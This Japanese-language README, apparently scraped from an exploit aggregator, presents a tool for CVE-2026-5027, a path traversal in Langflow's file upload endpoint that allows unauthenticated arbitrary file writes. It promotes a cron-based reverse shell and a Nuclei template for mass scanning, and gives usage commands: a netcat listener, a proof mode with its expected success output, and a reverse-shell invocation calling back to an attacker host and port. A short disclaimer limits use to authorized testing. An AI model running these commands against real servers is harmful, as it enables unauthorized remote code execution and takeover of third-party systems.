## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-5027
# 🔥 CVE-2026-5027 - Langflow パストラバーサル

**任意ファイル書き込みによるRCE**
_未認証のリモートコード実行(ファイルアップロード経由)_
 -orange?style=for-the-badge) 
* * *
## 📌 概要
**Langflow** は、ファイルアップロードエンドポイント(`POST /api/v2/files`)において重大な**パストラバーサル** の脆弱性の影響を受けます。
攻撃者は、`../` シーケンスを含む悪意のあるファイル名を送信することで、サーバーのファイルシステム上の任意の場所に**任意のファイルを書き込む** ことができます。
これは、例えばウェブシェルを配置したり crontab に注入したりすることで、**完全なリモートコード実行(RCE)** に容易に繋がります。
* * *
## 🛠️ 機能
* ✅ 未認証での悪用(デフォルトの自動ログイン設定)
* ✅ シンプルな概念実証(`/tmp` にテストファイルを書き込み)
* ✅ cron による完全なリバースシェル(Linux)
* ✅ 大量スキャン用の Nuclei テンプレート付属
* ✅ トラバーサル深度のカスタマイズが容易
* * *
## 🚀 クイックスタート
### 1\. 概念実証(安全なテスト)
root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof
**脆弱性がある場合の期待される出力:**
root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
### 2\. 完全なリバースシェル
root@kitploit:~
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
* * *
## 📁 リポジトリ構成
ファイル| 説明
---|---
`CVE-2026-5027.py`| メインの Python エクスプロイト(PoC + RCE)
`CVE-2026-5027.yaml`| スキャン用の Nuclei テンプレート
`README.md`| このファイル
* * *
## 🎯 使用例

**証明モード**
root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof
**リバースシェルモード**
root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
* * *
## ⚠️ 免責事項
このリポジトリは、**教育的および許可されたセキュリティテストの目的のみ** で提供されています。
責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。
* * *
**レッドチームコミュニティのために ❤️ を込めて作られました**